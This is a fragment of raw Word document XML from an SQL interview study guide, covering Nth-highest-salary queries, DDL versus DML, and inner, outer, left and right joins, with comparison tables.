    </w:p>
    <w:p w14:paraId="44C629DA"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140580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C7ECBF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LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47642D2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AS temp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6926309C"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7923D298"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DISTINCT emp_sal</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the duplicate salary values are excluded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53101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ORDER BY emp_sal DESC</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Orders the salaries in descending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C7050"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LIMIT 10</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Limits the result to the top 10 salaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D6496"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MIN(emp_sal)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since we are only looking for the 10th highest salary, MIN will give the lowest value from the top 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025898D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SQL Server (using ROW_NUMBER()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB915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ITH SalaryRank AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732D93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 ROW_NUMBER() OVER (ORDER BY emp_sal DESC) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C52A4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AF4420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7951A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 AS 10th_highest_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2656D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SalaryRank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDDAA9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ank = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5C60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Oracle (using ROWNUM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA174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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B4BB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57E3A3E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314F17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6580989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16B50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CFBD7F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OWNUM = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499625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hese queries will give you the 10th highest salary from the Employee table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAAD24E" w14:textId="584457A0"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3242" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FF038" w14:textId="2FB35B05" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="006151B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="783" w:name="_Toc197867997"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00930C87" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between DDL and DML commands</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="783"/>
    </w:p>
    <w:p w14:paraId="5BBAB70D" w14:textId="0DA470A0"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a clear difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DDL (Data Definition Languag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DML (Data Manipulation Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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324"/>
        <w:gridCol w:w="4138"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="24444859" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="250D55F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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BA71828"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DL (Data Definition Language)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="245677F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ML (Data Manipulation Language)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="20DE2D88" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A98321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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC723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Defines or modifies structure of database objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A422F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anages data within database objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="512AAF72" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06857F0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fects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A678B2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chema/Structure (like tables, views)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0152664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Table Data (insert, update, delete records)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="3FE5E79B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9999B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xamples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AA8C4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REATE, ALTER, DROP, TRUNCATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01D412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INSERT, UPDATE, DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="543F0C9B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71F30E4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1477E35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Auto-committed (cannot be rolled back)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5659F5F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an be rolled back or committed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="7542FA63" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11D36F6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 Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776574C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define or modify tables or schemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A3D85C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manipulate records inside a table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="2D750472" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="258C9D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sistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E927D2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are permanent immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D86A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can be temporary until committed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D3845BA"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2D7F93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DL = Structure-related operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62817EFC" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB59DE" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DML = Data-related operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE3535" w14:textId="2DCC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3243" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DEAB86" w14:textId="521F324C" w:rsidR="003C547F" w:rsidRPr="00CE4B95" w:rsidRDefault="00615670">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="784" w:name="_Toc197867998"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Inner join and Outer join</w:t>
      </w:r>
      <w:r w:rsidR="003C547F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="784"/>
    </w:p>
    <w:p w14:paraId="7B5C4639" w14:textId="5040F01F"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w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between INNER JOIN and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3954"/>
        <w:gridCol w:w="4994"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="5B112898" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DFEFAA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59E1F17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NNER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFA440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ER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="78BC890E" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C4F3DD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4703324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only </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>matching records</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from both tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60AD705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matching + non-matching records</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from one or both tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="60932834" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E2E62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 Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A460F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only common</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> data where the join condition is true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5729259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common + unmatched</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> rows filled with NULL from one/both tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="6EF96F4E" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="087A4EC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ypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="572BD8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 sub-types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482C85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ree sub-types: </w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LEFT JOIN, RIGHT JOIN, FULL JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="1C598299" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="723001E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36C559B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Usually faster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C0FFC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lightly slower due to extra rows with NULLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="381A347B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F3F05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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1957FB6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INNER JOIN B ON A.id = B.id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F54179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 (or RIGHT/FULL JOIN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="605C1BBD"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Visual Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A0FF5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NER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Only where A and B have a match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FC8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 All from A + matches from B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E9CC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IGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → All from B + matches from A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78821F7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LL OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → All from both, with NULLs where no match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD0A0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t me know if you’d like Venn diagrams for clarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A3F62" w14:textId="2BAA29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3244" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E2D447" w14:textId="467D125C" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00615670">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="785" w:name="_Toc197867999"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between left outer join and right outer join</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="785"/>
    </w:p>
    <w:p w14:paraId="5C547D00" w14:textId="10E9A211" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between LEFT OUTER JOIN and RIGHT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365"/>
        <w:gridCol w:w="4381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="0EF09219" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="304C48D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7992F96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OUTER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1677D9F0"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OUTER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="2ED8E343" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E218E9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28690C7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nd matching rows from the right table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610F9BC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right table</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and matching rows from the left table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="2061509B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
